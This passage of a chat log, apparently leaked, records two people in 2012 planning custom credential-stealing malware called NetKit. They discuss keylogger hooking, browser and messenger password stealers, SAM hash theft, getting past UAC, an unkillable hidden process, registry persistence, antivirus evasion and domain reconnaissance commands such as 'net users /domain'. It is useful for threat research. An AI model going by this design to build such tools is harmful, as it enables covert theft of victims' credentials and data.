  341. [11/29/2012 1:06:17 AM] Shelly Bongo: from scratch, not based on leaked source of zeus etc., ?
  342. [11/29/2012 1:07:04 AM] ' Tweety HF;: Of course. I never ever use sources.
  343. [11/29/2012 1:07:15 AM] ' Tweety HF;: Everything is 1000% personalized for my client in question.
  344. [11/29/2012 1:08:12 AM] Shelly Bongo: including form grabbing, webinject support etc?
  345. [11/29/2012 1:09:18 AM] ' Tweety HF;: Yes but for form grabbing etc I need to custom code C/C++/ASM modules to inject.
  346. [11/29/2012 1:09:56 AM] Shelly Bongo: that means what, that it'll take considerably more time?
  347. [11/29/2012 1:10:31 AM] ' Tweety HF;: I guess so. However, you can market off any RAT with basic features and I can update them as we progress.
  348. [11/29/2012 1:12:26 AM] Shelly Bongo: don't understand, what do you mean by "you can market off any RAT" ?
  349. [11/29/2012 1:13:14 AM] ' Tweety HF;: As in you have your RAT in basic functions. Tell them what will be added soon, and start selling to to customers. Have an auto update function and I can add a form grabber etc and it will update and have those moduels in.
  350. [11/29/2012 1:46:02 AM] ' Tweety HF;: Embedding resources for the API hooking and native calls for you keyogger.
  351. [11/29/2012 1:46:16 AM] ' Tweety HF;: Once that is done I will be starting on the body.
  352. [11/29/2012 1:57:47 AM] *** Shelly Bongo sent Jitsi.lnk ***
  353. [11/29/2012 1:58:04 AM] Shelly Bongo: wrong button
  354. [11/29/2012 1:58:34 AM] ' Tweety HF;: Uh ok
  355. [11/29/2012 2:33:37 AM] ' Tweety HF;: Adding basic functionality as well as start up and isntallation kits.
  356. [11/29/2012 3:07:28 AM] ' Tweety HF;: Do you want the intervals to be easy to configure?
  357. [11/29/2012 3:09:33 AM] Shelly Bongo: yes
  358. [11/29/2012 3:09:55 AM] ' Tweety HF;: I got most of it down, just doing every possible key I can think of at the moment
  359. [11/29/2012 3:10:08 AM] Shelly Bongo: everything should be modular and easy to conifugre, no inline assembly please :)
  360. [11/29/2012 3:10:22 AM] Shelly Bongo: sweet
  361. [11/29/2012 3:18:15 AM] ' Tweety HF;: I'm using a silent Framework installer, that okay?
  362. [11/29/2012 3:19:57 AM] Shelly Bongo: yes, that's what we discussed, 2.0 right?
  363. [11/29/2012 3:20:09 AM] ' Tweety HF;: Yes.
  364. [11/29/2012 3:20:14 AM] ' Tweety HF;: I will write it up in ASM.
  365. [11/29/2012 3:20:16 AM] ' Tweety HF;: That ok?
  366. [11/29/2012 3:20:23 AM] Shelly Bongo: how is it going to be bundled with the resulting exe?
  367. [11/29/2012 3:20:38 AM] Shelly Bongo: the installation is probably 20+mb
  368. [11/29/2012 3:21:38 AM] ' Tweety HF;: I will store the bytes of both the malware I am making for you and the .NET 2.0 installer, it will run the bytes of the installer first, once it is complete, it will run the malware.
  369. [11/29/2012 3:21:57 AM] Shelly Bongo: how large is the .net installer?
  370. [11/29/2012 3:22:16 AM] ' Tweety HF;: Not large at all I'm assuming
  371. [11/29/2012 3:23:04 AM] Shelly Bongo: http://download.cnet.com/Microsoft-NET-Framework-Redistributable-Package-x86/3000-10250_4-10726028.html
  372. [11/29/2012 3:23:09 AM] Shelly Bongo: that's 20mb... quite large
  373. [11/29/2012 3:23:18 AM] Shelly Bongo: and, there are different files for 32/64 bit
  374. [11/29/2012 3:23:27 AM] Shelly Bongo: diff installations
  375. [11/29/2012 3:23:34 AM] ' Tweety HF;: Not a problem.
  376. [11/29/2012 3:23:37 AM] Shelly Bongo: what do you suggest?
  377. [11/29/2012 3:23:59 AM] Shelly Bongo: you want to store 20mb of the installation on top of the malware?
  378. [11/29/2012 3:24:08 AM] ' Tweety HF;: Nope.
  379. [11/29/2012 3:24:30 AM] ' Tweety HF;: I will use sockets and extract the bytes from the web itself, so it wil download the correct installer.
  380. [11/29/2012 3:24:41 AM] ' Tweety HF;: Before it does that it will check the architecure of the system first.
  381. [11/29/2012 3:24:47 AM] ' Tweety HF;: And pick the correct installer.
  382. [11/29/2012 3:25:15 AM] Shelly Bongo: okay
  383. [11/29/2012 3:25:43 AM] Shelly Bongo: do you check if it's installed before attempting to install it?
  384. [11/29/2012 3:26:49 AM] ' Tweety HF;: Yes of course.
  385. [11/29/2012 2:25:43 PM] ' Tweety HF;: Just woke up, finishing the hook. Currently detected, just removing some detections before I proceed any further.
  386. [11/29/2012 2:47:30 PM] ' Tweety HF;: Do you want it fully PHP'd or F2P?
  387. [11/29/2012 2:47:36 PM] ' Tweety HF;: FTP?
  388. [11/29/2012 3:30:02 PM] Shelly Bongo: hi
  389. [11/29/2012 3:30:18 PM] Shelly Bongo: can you implement both?
  390. [11/29/2012 3:30:39 PM] Shelly Bongo: PHP is a must, FTP will be nice too
  391. [11/29/2012 3:30:45 PM] Shelly Bongo: if you can put it in, great
  392. [11/29/2012 3:31:08 PM] ' Tweety HF;: Both is kind of pointless. F2P is directly into your hosting area.
  393. [11/29/2012 3:31:15 PM] ' Tweety HF;: I think I will stick to PHP as it's more secure.
  394. [11/29/2012 3:31:23 PM] Shelly Bongo: F2P ?
  395. [11/29/2012 3:31:46 PM] ' Tweety HF;: F2P you will need to put your domain log in details so it's not a good idea lol..
  396. [11/29/2012 3:31:47 PM] Shelly Bongo: lets stick to PHP only
  397. [11/29/2012 3:31:55 PM] ' Tweety HF;: I agree.
  398. [11/29/2012 3:38:05 PM] ' Tweety HF;: The hook is completed.
  399. [11/29/2012 3:38:17 PM] ' Tweety HF;: Added in window handling as well as num keys
  400. [11/29/2012 5:06:15 PM] ' Tweety HF;: Hook is fully complete. Taking a break, will build the body namespace.
  401. [11/29/2012 5:38:36 PM] ' Tweety HF;: Do you want any reporting?
  402. [11/29/2012 5:40:42 PM] Shelly Bongo: i'd like it to report once it is installed
  403. [11/29/2012 5:40:54 PM] Shelly Bongo: (e.g. within a random time between 1-5 minutes after installation)
  404. [11/29/2012 5:41:12 PM] Shelly Bongo: what other kinds of reportings do you have in mind?
  405. [11/29/2012 5:43:14 PM] ' Tweety HF;: I meant error handling in general.
  406. [11/29/2012 5:43:45 PM] Shelly Bongo: the users should never see anything, we covered that (stealth)
  407. [11/29/2012 5:43:57 PM] Shelly Bongo: can you make the process autorecover from attempts to kill it?
  408. [11/29/2012 5:44:11 PM] ' Tweety HF;: I know, but I'm saying if anything goes wrong do you want it to report to your PHP script and tell you everything?
  409. [11/29/2012 5:44:20 PM] ' Tweety HF;: And yes, the process will be unkillable + inviisble.
  410. [11/29/2012 5:44:26 PM] ' Tweety HF;: It has auto start up.
  411. [11/29/2012 5:44:30 PM] Shelly Bongo: i do, sorry for the misunderstanding
  412. [11/29/2012 5:44:36 PM] ' Tweety HF;: No problem.
  413. [11/29/2012 5:44:41 PM] Shelly Bongo: for example, if an AV tries to kill the process - i'd like to know
  414. [11/29/2012 5:44:55 PM] ' Tweety HF;: Alright.
  415. [11/29/2012 5:45:03 PM] Shelly Bongo: btw, can you make it send a running processes/services list too?
  416. [11/29/2012 5:45:12 PM] Shelly Bongo: so i can tell which AV if any is running
  417. [11/29/2012 5:46:05 PM] ' Tweety HF;: If you want a list of all AV I can auto detect them, so isntead of a list you can have only the AV's? I can do list too if you want.
  418. [11/29/2012 5:47:18 PM] Shelly Bongo: i prefer the list - can you make it include the process name, PID, image path, and process description?
  419. [11/29/2012 5:47:23 PM] Shelly Bongo: as seen in process manager
  420. [11/29/2012 5:47:26 PM] Shelly Bongo: s/process/taks/
  421. [11/29/2012 5:47:29 PM] Shelly Bongo: *task
  422. [11/29/2012 5:47:47 PM] ' Tweety HF;: Yes.
  423. [11/29/2012 5:47:59 PM] Shelly Bongo: great
  424. [11/29/2012 6:49:22 PM] ' Tweety HF;: Finished the browser stealers.
  425. [11/29/2012 6:49:29 PM] ' Tweety HF;: All working.
  426. [11/29/2012 7:30:39 PM] ' Tweety HF;: Doing the logs now
  427. [11/29/2012 8:27:44 PM] ' Tweety HF;: I added a Windows Key Stealer
  428. [11/29/2012 8:40:01 PM] Shelly Bongo: what does it mean - for the Windows account being run?
  429. [11/29/2012 8:40:10 PM] Shelly Bongo: it steals the NTLM hash?
  430. [11/29/2012 8:40:46 PM] ' Tweety HF;: What you mean?
  431. [11/29/2012 8:40:58 PM] ' Tweety HF;: It's the Key for the operation system.
  432. [11/29/2012 8:41:00 PM] ' Tweety HF;: Like the CD key
  433. [11/29/2012 8:47:22 PM] ' Tweety HF;: Do you want an injection?
  434. [11/29/2012 8:47:36 PM] Shelly Bongo: oh, got you
  435. [11/29/2012 8:47:55 PM] Shelly Bongo: i thought you can also create a stealer for the logged in account
  436. [11/29/2012 8:48:10 PM] ' Tweety HF;: I have. It steals all browser passwords.
  437. [11/29/2012 8:48:43 PM] Shelly Bongo: no, i mean a stealer for the logged in account - the hash of the password they used to authenticate when logging into Windows
  438. [11/29/2012 8:49:22 PM] ' Tweety HF;: Oh, why would you want that..?
  439. [11/29/2012 8:50:04 PM] Shelly Bongo: same reason for why you'd want any other stealer
  440. [11/29/2012 8:50:09 PM] Shelly Bongo: to get the credentials of the target
  441. [11/29/2012 8:50:32 PM] ' Tweety HF;: But the windows password is kind of pointless
  442. [11/29/2012 8:53:26 PM] Shelly Bongo: how is it pointless? users typically reuse passwords
  443. [11/29/2012 8:54:27 PM] Shelly Bongo: anyway, if you can't add it in then fine, if you can that'll be swell - it's not critical at this point
  444. [11/29/2012 8:54:50 PM] ' Tweety HF;: I will add it, just need to find a decryption method.
  445. [11/29/2012 8:54:56 PM] ' Tweety HF;: Also, do you want injection support.
  446. [11/29/2012 8:55:41 PM] Shelly Bongo: a decryption method for what?
  447. [11/29/2012 8:55:52 PM] Shelly Bongo: what does "injection support" mean, injection of what?
  448. [11/29/2012 8:56:07 PM] ' Tweety HF;: To decript the SAM files where the passwords are located in.
  449. [11/29/2012 8:56:23 PM] ' Tweety HF;: Injection support, taking your malware and injecting the bytes into a real process.
  450. [11/29/2012 8:56:30 PM] ' Tweety HF;: So a process like svchost.exe or something
  451. [11/29/2012 8:56:37 PM] ' Tweety HF;: That way you dont need to make process protection.
  452. [11/29/2012 8:56:52 PM] ' Tweety HF;: It's how a Crypter runs.
  453. [11/29/2012 8:57:42 PM] Shelly Bongo: what would be the cons of injecting into a process rather than use our own process and protect it?
  454. [11/29/2012 8:58:12 PM] ' Tweety HF;: If you inject into svchost.exe it cannot be killed because the process is required by the system
  455. [11/29/2012 8:58:21 PM] ' Tweety HF;: if you do it using process protection, same thing
  456. [11/29/2012 8:58:30 PM] ' Tweety HF;: but injection support is more difficult and hard to fud
  457. [11/29/2012 9:02:22 PM] Shelly Bongo: so adding injection could make it less stealthy (easier to detect by AV) ?
  458. [11/29/2012 9:03:12 PM] ' Tweety HF;: Yes but the performance is better, it runs directly in a process and is more stable.
  459. [11/29/2012 9:03:16 PM] ' Tweety HF;: Which would you pick.
  460. [11/29/2012 9:03:22 PM] Shelly Bongo: i pick stealth
  461. [11/29/2012 9:03:30 PM] ' Tweety HF;: Ok.
  462. [11/29/2012 9:03:37 PM] Shelly Bongo: not increase chances with AV detecting this
  463. [11/29/2012 9:03:45 PM] ' Tweety HF;: Ok lol.
  464. [11/29/2012 9:04:04 PM] ' Tweety HF;: Currently writing a decryption method for windows passwords.
  465. [11/29/2012 9:04:11 PM] Shelly Bongo: okay
  466. [11/29/2012 9:21:44 PM] ' Tweety HF;: It's not possible to get the hashes because it will throw UAC
  467. [11/29/2012 9:27:09 PM] Shelly Bongo: even if the user is an admin?
  468. [11/29/2012 9:27:30 PM] ' Tweety HF;: Yes because it still prompts for UAC
  469. [11/29/2012 9:27:48 PM] Shelly Bongo: hmm okay, no way around uac? (e.g. make it invisible and click "yes" for the user somehow)
  470. [11/29/2012 9:30:03 PM] ' Tweety HF;: Not possible.
  471. [11/29/2012 9:30:45 PM] Shelly Bongo: http://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
  472. [11/29/2012 9:31:44 PM] ' Tweety HF;: You need to drop that file in the config file
  473. [11/29/2012 9:31:45 PM] Shelly Bongo: okay if not then forget it for now
  474. [11/29/2012 9:31:50 PM] ' Tweety HF;: Droppping in config = UAC
  475. [11/29/2012 9:33:28 PM] Shelly Bongo: we'll go without this then
  476. [11/29/2012 9:35:42 PM] ' Tweety HF;: Doing server installation, start up (3x) and UAC bypassing atm
  477. [11/29/2012 9:40:41 PM] Shelly Bongo: which startup methods are you selecting?
  478. [11/29/2012 9:42:41 PM] ' Tweety HF;: HKLMU HKLCU + Dir
  479. [11/29/2012 9:44:47 PM] Shelly Bongo: what does 'dir' mean? which dir, startup folder in start memnu?
  480. [11/29/2012 9:44:53 PM] Shelly Bongo: *menu
  481. [11/29/2012 9:49:01 PM] ' Tweety HF;: yes
  482. [11/29/2012 9:51:08 PM] Shelly Bongo: okay
  483. [11/29/2012 10:22:14 PM] Shelly Bongo: i'm out for the day, if needed i shall be here tomorrow as well
  484. [11/29/2012 10:22:36 PM] ' Tweety HF;: Alright.
  485. [11/29/2012 10:22:40 PM] ' Tweety HF;: I should be done by tomorrow.
  486. [11/30/2012 8:10:50 PM] ' Tweety HF;: For the hook, when I press Back space should it delete the key or should it just write ][backspace]?
  487. [11/30/2012 8:15:34 PM] ' Tweety HF;: ?
  488. [11/30/2012 10:28:30 PM] ' Tweety HF;: ??
  489. [11/30/2012 10:39:37 PM] Shelly Bongo: hi
  490. [11/30/2012 10:40:01 PM] Shelly Bongo: write [backspace]
  491. [11/30/2012 10:41:08 PM] ' Tweety HF;: ok so you dont want it to delete the character?
  492. [11/30/2012 10:41:56 PM] Shelly Bongo: correct
  493. [11/30/2012 10:42:15 PM] ' Tweety HF;: Alright.
  494. [11/30/2012 10:42:48 PM] Shelly Bongo: can you make it configurable in the source?
  495. [11/30/2012 10:43:12 PM] Shelly Bongo: (a future version could output an additional "formatted" line if special chars like backspace/delete are used, which will display the effective text enterred, and delete characters that the user deleted using backspace/etc.)
  496. [11/30/2012 10:43:31 PM] ' Tweety HF;: that will slow down the hook a lot
  497. [11/30/2012 10:43:35 PM] ' Tweety HF;: your going to lose keys
  498. [11/30/2012 10:43:45 PM] ' Tweety HF;: it needs to be one or the other
  499. [11/30/2012 10:44:03 PM] Shelly Bongo: which of my 2 lines are you responding to right now - the second i gather?
  500. [11/30/2012 10:45:01 PM] Shelly Bongo: making this configurable in the source, e.g. using defines, should have absolutely 0 impact on runtim
  501. [11/30/2012 10:45:06 PM] Shelly Bongo: s/runtim/runtime
  502. [11/30/2012 10:46:19 PM] Shelly Bongo: anyway, you can make it write [backspace] for now, we don't have to have this argument now, using [backspace] will allow for manual inspection of entered text
  503. [11/30/2012 10:46:52 PM] Shelly Bongo: how does the hook handle clipboard pastes of text by the way?
  504. [11/30/2012 10:47:30 PM] ' Tweety HF;: if it detects any data being changed in the clipboard it will write log it.
  505. [11/30/2012 10:47:40 PM] Shelly Bongo: okay
  506. [11/30/2012 10:48:17 PM] Shelly Bongo: i have to leave in 3 minutes
  507. [11/30/2012 10:48:20 PM] ' Tweety HF;: Alright.
  508. [11/30/2012 10:48:24 PM] Shelly Bongo: do you have more questions?
  509. [11/30/2012 10:48:26 PM] ' Tweety HF;: Nope.
  510. [11/30/2012 10:48:31 PM] ' Tweety HF;: When will you be onlin next
  511. [11/30/2012 10:48:42 PM] Shelly Bongo: you know what, i'll be around in the next few hours
  512. [11/30/2012 10:48:45 PM] Shelly Bongo: forget it
  513. [11/30/2012 10:48:46 PM] Shelly Bongo: so i'm here
  514. [11/30/2012 10:48:51 PM] ' Tweety HF;: Alright.
  515. [11/30/2012 10:48:57 PM] ' Tweety HF;: I'll be done soon.
  516. [11/30/2012 10:49:02 PM] ' Tweety HF;: Then its just the PHP file
  517. [11/30/2012 10:52:36 PM] Shelly Bongo: the stealer part is complete?
  518. [11/30/2012 10:52:59 PM] Shelly Bongo: pass stealer that is
  519. [11/30/2012 10:53:14 PM] ' Tweety HF;: I got browsers done
  520. [11/30/2012 10:53:21 PM] ' Tweety HF;: I will do the others later on
  521. [11/30/2012 10:53:47 PM] Shelly Bongo: okay, and you didn't start the file stealer yet, correct?
  522. [11/30/2012 10:54:22 PM] ' Tweety HF;: Nope, i will need to do that last due to you wanting it to be custom configred
  523. [11/30/2012 11:05:03 PM] Shelly Bongo: okay, so it doesn't sound like you will finish today as there's still much to be done
  524. [11/30/2012 11:06:24 PM] Shelly Bongo: also the AV testing should take a few hours probably, with your AV virtual machines
  525. [11/30/2012 11:07:41 PM] Shelly Bongo: tomorrow, around same time as now, i will give you an elaborate description of the file stealer requirements, what should be configurable, etc. - okay?
  526. [11/30/2012 11:15:40 PM] ' Tweety HF;: Alright.
  527. [12/1/2012 3:59:07 AM] ' Tweety HF;: Fully completed keyboard hooking.
  528. [12/1/2012 3:59:16 AM] ' Tweety HF;: will work on stealers now.
  529. [12/1/2012 3:59:20 AM] ' Tweety HF;: Can you list them all down?
  530. [12/1/2012 10:33:57 AM] Shelly Bongo: IM - skype, icq, msn/live, yahoo, google talk
  531. Mail clients - outlook/thunderbird
  532. Browsers - IE, FF, chrome, safari
  533.  
  534. + sysinfo
  535.  
  536. also, reminder about screenshots every interval when logs are sent
  537. [12/1/2012 10:51:20 PM] ' Tweety HF;: I finished the system informations
  538. [12/1/2012 10:51:22 PM] ' Tweety HF;: Is this okay?
  539. [12/1/2012 10:52:07 PM] ' Tweety HF;: http://pastebin.com/iihDn5gN
  540. [12/1/2012 11:37:44 PM] Shelly Bongo: hi, yes, that's great
  541. [12/1/2012 11:38:36 PM] Shelly Bongo: i came here to apologize that i won't be able to send the file stealer description at the scheduled time - it'll be done around 12 hours from now, okay?
  542. [12/2/2012 12:19:17 AM] ' Tweety HF;: sure
  543. [12/2/2012 12:26:44 AM] Shelly Bongo: Framework4,0,30319,0Windows CD Key: 32KD2-K9CTF-M3DJT-4J3WC-733WD
  544. [12/2/2012 12:26:52 AM] Shelly Bongo: forgot to \n before "Windows CD Key"
  545. [12/2/2012 12:28:12 AM] Shelly Bongo: about sysinfo - is there any way to know whether the user is logged into AD? (e.g. is a network user)
  546. [12/2/2012 12:30:35 AM] ' Tweety HF;: what does AD stand for
  547. [12/2/2012 12:31:14 AM] Shelly Bongo: active directory
  548. [12/2/2012 12:31:24 AM] Shelly Bongo: e.g. a part of corporate network
  549. [12/2/2012 12:48:16 AM] Shelly Bongo: i found a way to do it
  550. [12/2/2012 12:48:18 AM] Shelly Bongo: are you there?
  551. [12/2/2012 12:52:26 AM | Edited 12:52:51 AM] Shelly Bongo: Please add the below to the "system information" output
  552.  
  553. Environmental variable output:
  554. Computer name - %COMPUTERNAME%
  555. Logon server - %LOGONSERVER%
  556. Domain - %USERDOMAIN%
  557.  
  558. Command output:
  559. net users
  560. net users /domain
  561. net share
  562. net view
  563. net view /domain
  564. [12/2/2012 12:52:49 AM] ' Tweety HF;: Alright
  565. [12/2/2012 12:53:01 AM] ' Tweety HF;: Sorry went to have some dinner.
  566. [12/2/2012 12:53:07 AM] ' Tweety HF;: I'll get on it now.
  567. [12/2/2012 12:53:26 AM] Shelly Bongo: okay
  568. [12/2/2012 12:54:24 AM] Shelly Bongo: NetKit is the name you gave ? :)
  569. [12/2/2012 12:57:28 AM] ' Tweety HF;: Yes.
  570. [12/2/2012 1:03:12 AM] Shelly Bongo: quite a nice name actually
  571. [12/2/2012 1:04:36 AM] Shelly Bongo: can you please send the sysinfo dump after the udpate?
  572. [12/2/2012 1:04:40 AM | Edited 1:04:52 AM] Shelly Bongo: s/udpate/update
  573. [12/2/2012 1:05:09 AM] ' Tweety HF;: Sec
  574. [12/2/2012 1:12:56 AM] ' Tweety HF;: What you mean logon server and domain
  575. [12/2/2012 1:14:18 AM] Shelly Bongo: just output the value of those environmental variables
  576. [12/2/2012 1:14:41 AM] Shelly Bongo: Logon server - the server with which authentication took place during logon, and Domain - the domain to which the user is bound
  577. [12/2/2012 1:16:33 AM] ' Tweety HF;: How do I get those values
  578. [12/2/2012 1:18:33 AM] Shelly Bongo: in cmd.exe, type: echo %COMPUTERNAME%
  579. [12/2/2012 1:18:39 AM] Shelly Bongo: or the other 2
  580. [12/2/2012 1:18:57 AM] Shelly Bongo: (i'm sure there's a way to get it via .net)
  581. [12/2/2012 1:19:27 AM] ' Tweety HF;: Yeah alright
  582. [12/2/2012 1:19:29 AM] ' Tweety HF;: I got the computer name
  583. [12/2/2012 1:19:40 AM] ' Tweety HF;: But idk how to get domain and logon server
  584. [12/2/2012 1:19:53 AM | Edited 1:20:04 AM] Shelly Bongo: type: echo %USERDOMAIN%
  585. [12/2/2012 1:20:05 AM] ' Tweety HF;: alright
  586. [12/2/2012 1:20:26 AM] Shelly Bongo: they are environmental variable
  587. [12/2/2012 1:20:28 AM] Shelly Bongo: s
  588. [12/2/2012 1:20:33 AM] Shelly Bongo: so you can get them all the same way
  589. [12/2/2012 1:20:58 AM] ' Tweety HF;: It says file not found
  590. [12/2/2012 1:21:03 AM] ' Tweety HF;: so = no domain?
  591. [12/2/2012 1:21:28 AM] Shelly Bongo: C:\Users\1234>echo %USERDOMAIN%
  592. 1234-PC
  593. [12/2/2012 1:21:43 AM] Shelly Bongo: what output do you get?
  594. [12/2/2012 1:21:48 AM] ' Tweety HF;: A bit confused lol..
  595. [12/2/2012 1:22:35 AM] Shelly Bongo: ?
  596. [12/2/2012 1:22:37 AM] Shelly Bongo: open cmd.exe
  597. [12/2/2012 1:22:47 AM] Shelly Bongo: and type: echo %LOGONSERVER%
  598. [12/2/2012 1:23:05 AM] ' Tweety HF;: ohh
  599. [12/2/2012 1:23:05 AM] ' Tweety HF;: i see
  600. [12/2/2012 1:23:11 AM] ' Tweety HF;: but thats the same as pc name?
  601. [12/2/2012 1:23:36 AM] Shelly Bongo: for logonserver yes because i am doing a networkless logon (local authentication)
  602. [12/2/2012 1:23:44 AM] ' Tweety HF;: so that output is fine with you?
  603. [12/2/2012 1:23:50 AM] ' Tweety HF;: \\PCNAME\
  604. [12/2/2012 1:24:08 AM] Shelly Bongo: yes
  605. [12/2/2012 1:24:14 AM] ' Tweety HF;: uhh
  606. [12/2/2012 1:24:15 AM] ' Tweety HF;: ok lol
  607. [12/2/2012 1:25:35 AM] Shelly Bongo: hmm
  608. [12/2/2012 1:25:55 AM] Shelly Bongo: i just verified - the output of %userdomain% is wrong - it doens't output the real domain, so you can skip it
  609. [12/2/2012 1:26:00 AM] Shelly Bongo: just do computername & logonserver
  610. [12/2/2012 1:26:04 AM] ' Tweety HF;:
  611. ok
  612. [12/2/2012 1:26:29 AM] Shelly Bongo: about the "net" command outputs, please add the command "net config workstation" to the end too, this will show the domain/workgroup
  613. [12/2/2012 1:26:54 AM] ' Tweety HF;: ok
  614. [12/2/2012 1:52:52 AM] Shelly Bongo: an unrelated question - do you have access to webinjects for spyeye/zeus-family?
  615. [12/2/2012 1:54:42 AM] ' Tweety HF;: lol
  616. [12/2/2012 1:54:43 AM] ' Tweety HF;: No but I am making one for fun
  617. [12/2/2012 2:01:03 AM] ' Tweety HF;: I made one better than zeus though before
  618. [12/2/2012 2:01:23 AM] ' Tweety HF;: it uses a single dll injection and writes the data into memory and dumps it straight into an irc channel
  619. [12/2/2012 2:01:50 AM] Shelly Bongo: making what for fun, a zeus alternative?
  620. [12/2/2012 2:03:04 AM] ' Tweety HF;: Not zeus, but the form grabber injection dll
  621. [12/2/2012 2:06:19 AM] Shelly Bongo: is form grabbing not just a keylogger for browser-space?
  622. [12/2/2012 2:06:32 AM] Shelly Bongo: or is this the component that also handles HTML injection?
  623. [12/2/2012 2:07:35 AM] ' Tweety HF;: It hooks onto the browsers process and injects itself into the memory, when memory entries are being processed the injection is being reversed and redirected into a memory mapping so it gets the forms that you need.
  624. [12/2/2012 2:08:00 AM] ' Tweety HF;: It's 10x faster than any keylogger.
  625. [12/2/2012 2:11:43 AM] Shelly Bongo: okay
  626. [12/2/2012 2:12:46 AM] Shelly Bongo: not to rush you or anything, but is the new sysinfo going to be ready soon?
  627. [12/2/2012 2:12:59 AM] ' Tweety HF;: yeah im just having a hard time reading streams atm
  628. [12/2/2012 2:13:15 AM] ' Tweety HF;: ---------------------------
  629. NetKit
  630. ---------------------------
  631. Microsoft Windows [Version 6.1.7601]
  632.  
  633. Copyright (coffee) 2009 Microsoft Corporation.  All rights reserved.
  634.  
  635.  
  636.  
  637. C:\Users\Momz\Desktop\NetKit\NetKit\bin\Debug>
  638. ---------------------------
  639. OK  
  640. ---------------------------
  641. [12/2/2012 2:13:33 AM] ' Tweety HF;: keeps returning that instead of the actual server dir
  642. [12/2/2012 2:14:37 AM] Shelly Bongo: wish i could help.
  643. [12/2/2012 2:14:38 AM] Shelly Bongo: :)
  644. [12/2/2012 2:14:50 AM] ' Tweety HF;: its no problem il fix it soon lol
  645. [12/2/2012 2:29:17 AM] Shelly Bongo: okay, i'm gone, back in 12 hours
  646. [12/2/2012 2:29:24 AM] ' Tweety HF;: alright
  647. [12/2/2012 2:29:25 AM] ' Tweety HF;: cya
  648. [12/2/2012 2:40:06 AM] ' Tweety HF;: doneee
  649. [12/2/2012 11:45:25 AM] Shelly Bongo: link?
  650. [12/2/2012 3:56:35 PM] ' Tweety HF;: Link for the log?
  651. [12/2/2012 3:58:38 PM] Shelly Bongo: hi
  652. [12/2/2012 3:58:45 PM] Shelly Bongo: yes, i wanted to see it if possible
  653. [12/2/2012 3:59:38 PM] Shelly Bongo: also - what's the current name of the files uploaded for screenshots/keylogs/passwords?
  654. [12/2/2012 4:00:11 PM] Shelly Bongo: [COMPUTERNAME]-[IP]-files-[TIMESTAMP]?
  655. [12/2/2012 4:00:28 PM] ' Tweety HF;: Not done that yet, I just have the sys log and stealer log done
  656. [12/2/2012 4:00:34 PM] Shelly Bongo: okay
  657. [12/2/2012 4:01:45 PM] Shelly Bongo: i have a thorough description of the docstealer feature ready, tell me when to send it
  658. [12/2/2012 4:04:28 PM] *** ' Tweety HF; sent test.txt ***
  659. [12/2/2012 4:05:51 PM] Shelly Bongo: nice
  660. [12/2/2012 4:05:56 PM] ' Tweety HF;: is it ok?
  661. [12/2/2012 4:06:12 PM] Shelly Bongo: Frameworks: .NET Framework4,0,30319,0, .NET Framework2,0,50727,0, .NET Framework4,0,30319,0Windows CD Key: 32KD2-K9CTF-M3DJT-4J3WC-733WD <-- forgot to put a "\n" between "Framework4,0,30319,0" and "Windows CD Key:"
  662. [12/2/2012 4:06:45 PM] Shelly Bongo: i see it is a merge of both the stealer log and the sysinfo
  663. [12/2/2012 4:07:00 PM] ' Tweety HF;: oh whoops
  664. [12/2/2012 4:07:01 PM] ' Tweety HF;: fixed it
  665. [12/2/2012 4:07:16 PM] ' Tweety HF;: sorry lol
  666. [12/2/2012 4:07:19 PM] ' Tweety HF;: anything else?
  667. [12/2/2012 4:07:40 PM] Shelly Bongo: it's missing the command outputs we discussed yesteryda
  668. [12/2/2012 4:07:41 PM] Shelly Bongo: [Sunday, December 02, 2012 12:52 AM] Shelly Bongo:
  669.  
  670. <<< Command output:
  671. net users
  672. net users /domain
  673. net share
  674. net view
  675. net view /domain
  676. [12/2/2012 4:07:59 PM] ' Tweety HF;: oh did you want them all?
  677. [12/2/2012 4:08:02 PM] Shelly Bongo: yes
  678. [12/2/2012 4:08:56 PM] ' Tweety HF;: ok i will add that
  679. [12/2/2012 4:09:00 PM] ' Tweety HF;: and net view does not work
  680. [12/2/2012 4:09:06 PM] ' Tweety HF;: it freezes for me
  681. [12/2/2012 4:09:10 PM] Shelly Bongo: you can use same output pattern, e.g.:
  682.  
  683.  ======= net users (cmd) ========
  684. [output here]
  685. ======= net users /domain (cmd) =====
  686. [output here]
  687. [12/2/2012 4:09:26 PM] ' Tweety HF;: ok :)
  688. [12/2/2012 4:10:33 PM] Shelly Bongo: it doesn't freeze, just takes a while - probably empty results
  689. [12/2/2012 4:10:34 PM] ' Tweety HF;: look
  690. [12/2/2012 4:10:58 PM] ' Tweety HF;: http://imgur.com/kzrzO
  691. [12/2/2012 4:11:35 PM] Shelly Bongo: okay, so output that error
  692. [12/2/2012 4:11:46 PM] Shelly Bongo: just do a simple output of whatever is the response of that command
  693. [12/2/2012 4:11:51 PM] ' Tweety HF;: ok
  694. [12/2/2012 4:11:55 PM] Shelly Bongo: some computers will output an error - some will output results
  695. [12/2/2012 4:11:56 PM] ' Tweety HF;: even if it is an error?
  696. [12/2/2012 4:11:57 PM] Shelly Bongo: yes
  697. [12/2/2012 4:12:04 PM] Shelly Bongo: plain & simple output
  698. [12/2/2012 4:12:07 PM] ' Tweety HF;: ok no problem
  699. [12/2/2012 4:12:54 PM] Shelly Bongo: i don't think you will finish by the end of the week at this rate
  700. [12/2/2012 4:13:18 PM] Shelly Bongo: how much time do you plan on working on this by the upcoming sunday?
  701. [12/2/2012 4:13:26 PM] Shelly Bongo: i will really like it to finish by then
  702. [12/2/2012 4:13:30 PM] ' Tweety HF;: It's sunday here.
  703. [12/2/2012 4:13:40 PM] Shelly Bongo: i mean 7 days from now
  704. [12/2/2012 4:13:44 PM] ' Tweety HF;: By next week?
  705. [12/2/2012 4:13:52 PM] ' Tweety HF;: I can definatly finish it by next week.
  706. [12/2/2012 4:14:03 PM] Shelly Bongo: okay
  707. [12/2/2012 4:14:39 PM] Shelly Bongo: as i see after the sysinfo improvements (small) there's more stealers to be done (it seems like only chrome/FF are in now), and then the docstealer feature
  708. [12/2/2012 4:14:59 PM] ' Tweety HF;: Yes I can do them, I will work on them now.
  709. [12/2/2012 4:15:26 PM] *** Shelly Bongo sent filestealer.txt ***
  710. [12/2/2012 4:15:40 PM] Shelly Bongo: feature description
  711. [12/2/2012 4:17:15 PM] ' Tweety HF;: Just 1 problem.
  712. [12/2/2012 4:17:16 PM] ' Tweety HF;: Ok I can do that
  713. [12/2/2012 4:17:28 PM] Shelly Bongo: ?
  714. [12/2/2012 4:17:33 PM] Shelly Bongo: what's the issue
